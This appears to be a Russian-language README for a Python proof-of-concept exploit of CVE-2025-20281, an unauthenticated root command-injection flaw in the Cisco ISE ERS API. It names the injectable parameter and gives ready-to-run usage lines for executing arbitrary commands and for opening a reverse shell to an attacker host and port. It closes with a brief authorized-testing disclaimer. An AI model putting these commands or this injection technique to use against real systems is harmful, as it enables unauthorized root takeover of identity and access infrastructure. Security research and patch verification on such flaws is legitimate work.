
Эксплойт для неаутентифицированного удаленного выполнения кода CVE-2025-20281 в Cisco ISE ERS API. Выполняйте команды или запускайте обратные оболочки от имени root — аутентификация не требуется.
Этот репозиторий содержит эксплойт для проверки концепции на Python 3 для CVE-2025-20281, критической уязвимости в Cisco Identity Services Engine (ISE), которая позволяет неавторизованное удаленное выполнение кода (RCE) с правами root через API ERS.
Конечная точка
/ers/sdk#_в ERS Cisco ISE не проверяет аутентификацию при обработке запросов на создание пользователя.
Внедряя команды оболочки в параметрnameобъектаInternalUser, злоумышленники могут добиться выполнения команд с правами root.
--cmd)--whoami--reverse)python3 CVE-2025-20281.py TARGET [--whoami | --cmd "id" | --reverse LHOST LPORT]
Тестовая команда:
python3 CVE-2025-20281.py 192.168.1.10 --whoami
Выполнить пользовательскую команду:
python3 CVE-2025-20281.py 192.168.1.10 --cmd "id && hostname"
Реверсивная оболочка:
python3 CVE-2025-20281.py 192.168.1.10 --reverse 10.10.14.99 4444
⚠️ Правовое предупреждение
Этот код предоставлен только для образовательных целей и авторизованного тестирования. Не используйте это программное обеспечение против сетей или систем, которыми вы не владеете или на тестирование которых у вас нет разрешения.
Уязвимость: раскрыта через уведомление Cisco
Рефакторинг PoC: illdeed